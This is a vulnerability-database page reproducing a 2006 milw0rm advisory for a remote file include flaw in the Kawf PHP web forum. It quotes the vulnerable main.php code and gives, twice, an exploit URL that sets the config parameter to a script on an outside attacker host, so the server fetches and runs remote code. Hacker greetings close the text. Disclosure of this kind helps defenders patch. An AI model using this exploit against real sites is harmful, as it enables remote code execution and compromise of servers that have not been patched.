Lucene search

SecurityvulnsSECURITYVULNS:DOC:14796

HistoryOct 23, 2006 - 12:00 a.m.

kawf (config) Remote File Include

2006-10-2300:00:00

vulners.com

317

JSON

####################################################################

kawf (config) Remote File Include

#---------------------------------------------------------------------------------------------

Kawf is a web forum written in PHP4 using MySQL

v. 1.0 and all below

#--------------------------------------------------------------------------------------------

download :

http://sourceforge.net/projects/kawf

#--------------------------------------------------------------------------------------------

see the bug file:

http://koders.com/php/fid2508A4F431485FD5A1154465381E69E592D8D005.aspx?s=require

#--------------------------------------------------------------------------------------------

bug in :

main.php

#--------------------------------------------------------------------------------------------
#code : { i wrote all code for str0ke :D :D } include in line 13 ::

/* First setup the path */

$include_path = "$srcroot/include:$srcroot/user/account";

if (isset($include_append))

$include_path .= ":" . $include_append;

$old_include_path = ini_get("include_path");

if (!empty($old_include_path))

$include_path .= ":" . $old_include_path;

ini_set("include_path", $include_path);

include_once("$config.inc");

require_once("sql.inc");

require_once("util.inc");

require_once("page.inc");

require_once("forumuser.inc");

sql_open($database);

include("index.php");

sql_close();

?>

#--------------------------------------------------------------------------------------------

exploit:

kawf/user/account/main.php?config=http://members.lycos.co.uk/o0xxdark0o3/ms.txt?

or

(path)/main.php?config=http://members.lycos.co.uk/o0xxdark0o3/ms.txt?

#--------------------------------------------------------------------------

greetz : str0ke , c0ldz3r0 , all members in xp10.cc , dm3r7.com , 4azhar.com all my friend in msn :D

inter_vieri_21 dont play runescape :d :d

#-------------------------------------------------------------------------

by o0xxdark0o

i think… so that… i m here

[email protected]

####################################################################

milw0rm.com [2006-10-21]

JSON

kawf &#40;config&#41; Remote File Include

kawf (config) Remote File Include

Kawf is a web forum written in PHP4 using MySQL

v. 1.0 and all below

download :

http://sourceforge.net/projects/kawf

see the bug file:

http://koders.com/php/fid2508A4F431485FD5A1154465381E69E592D8D005.aspx?s=require

bug in :

main.php

/* First setup the path */

$include_path = "$srcroot/include:$srcroot/user/account";

if (isset($include_append))

$include_path .= ":" . $include_append;

$old_include_path = ini_get("include_path");

if (!empty($old_include_path))

$include_path .= ":" . $old_include_path;

ini_set("include_path", $include_path);

include_once("$config.inc");

require_once("sql.inc");

require_once("util.inc");

require_once("page.inc");

require_once("forumuser.inc");

sql_open($database);

include("index.php");

sql_close();

?>

exploit:

kawf/user/account/main.php?config=http://members.lycos.co.uk/o0xxdark0o3/ms.txt?

or

(path)/main.php?config=http://members.lycos.co.uk/o0xxdark0o3/ms.txt?

greetz : str0ke , c0ldz3r0 , all members in xp10.cc , dm3r7.com , 4azhar.com all my friend in msn :D

inter_vieri_21 dont play runescape :d :d

by o0xxdark0o

i think… so that… i m here

[email protected]

milw0rm.com [2006-10-21]

kawf (config) Remote File Include